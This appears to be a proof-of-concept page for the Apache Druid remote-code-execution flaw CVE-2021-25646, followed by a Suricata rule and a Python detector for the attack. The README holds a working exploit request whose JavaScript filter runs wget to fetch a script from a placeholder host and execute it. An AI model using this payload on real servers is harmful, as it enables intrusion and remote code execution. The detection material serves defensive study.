
CVE-2021-25646 PoC — Authenticated users can override system configurations in their requests which allows them to execute arbitrary code.

Associated Vulnerability
Title: Authenticated users can override system configurations in their requests which allows them to execute arbitrary code. (CVE-2021-25646)
Description: Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
Readme
# Apache Druid RCE

# title="druid" && title=="Apache Druid"

```http
POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: x.x.x.x:8888
Content-Length: 612
Accept: application/json, text/plain, */*
Origin: http://x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://x.x.x.x:8888/unified-console.html
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('wget http://x.x.x.x/1.txt -O /tmp/1.sh && sh /tmp/1.sh')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"cacheKey":"73a90acaae2b1ccc0e969709665bc62f"}}
```

# Detection rules

```
alert http any any -> any any (msg:"ET EXPLOIT CVE-2021-25646 Apache Druid RCE POST"; flow:established,to_server; content:"POST"; http_method; content:"/druid/indexer/v1/sampler?for=filter"; http_uri; content:"java.lang.Runtime.getRuntime().exec("; http_client_body; nocase; reference:url,mp.weixin.qq.com/s/Eny6AnFarvvpjeEJNMfTrw; reference:cve,2021-25646; classtype:web-application-attack; sid:2031533; rev:2; metadata:affected_product Web_Server_Applications, created_at 2021_02_03, cve CVE_2021_25646, former_category EXPLOIT, signature_severity Major, updated_at 2021_02_03;)
```
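The Suricata signature above only fires on the literal `java.lang.Runtime.getRuntime().exec(` string, so a body that reaches the same sink through a different expression slips past it. As an added example (not from the original README or from the Druid project), the check below is JSON-aware instead: it walks any POST to the sampler endpoint and flags both a `"type":"javascript"` spec element and the empty-string key carrying an `enabled` override, the two features of the payload shown above. The sample bodies are constructed and use a harmless function body.

```python
import json
from urllib.parse import urlparse

SAMPLER_PATH = "/druid/indexer/v1/sampler"  # endpoint used by the README request


def _walk(node, path=()):
    """Yield (path, obj) for every JSON object nested anywhere in node."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from _walk(value, path + (key,))
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            yield from _walk(value, path + (idx,))


def inspect_sampler_request(method, uri, body):
    """Return findings for one HTTP request seen by a proxy or log pipeline.

    Flags (1) any spec element with "type":"javascript" and (2) the
    empty-string key carrying an "enabled" override, the combination the
    README payload uses to force JavaScript on regardless of server config.
    """
    findings = []
    if method.upper() != "POST" or urlparse(uri).path != SAMPLER_PATH:
        return findings
    try:
        doc = json.loads(body)
    except ValueError:
        return ["sampler POST with unparseable JSON body"]
    for path, obj in _walk(doc):
        where = "/".join(str(p) for p in path) or "<root>"
        if obj.get("type") == "javascript":
            findings.append(f"javascript-type element at {where}")
        if isinstance(obj.get(""), dict) and "enabled" in obj[""]:
            findings.append(f"empty-key config override at {where}")
    return findings


# Constructed sample (not the page's payload): same structure as the README
# request, with a harmless function body standing in for the command.
SUSPECT_BODY = json.dumps({"type": "index", "spec": {
    "ioConfig": {"type": "index", "firehose": {"type": "local", "baseDir": "quickstart/tutorial/"}},
    "dataSchema": {"dataSource": "sample", "transformSpec": {"transforms": [], "filter": {
        "type": "javascript", "function": "function(value){return true}",
        "dimension": "added", "": {"enabled": "true"}}}}},
    "samplerConfig": {"numRows": 500}})

# Constructed benign sampler request: a selector filter, no JavaScript involved.
BENIGN_BODY = json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {
    "filter": {"type": "selector", "dimension": "added", "value": "1"}}}}})
```

In an environment where JavaScript is legitimately enabled, the `javascript-type` finding is expected noise; the empty-key override has no legitimate use and is the one to alert on.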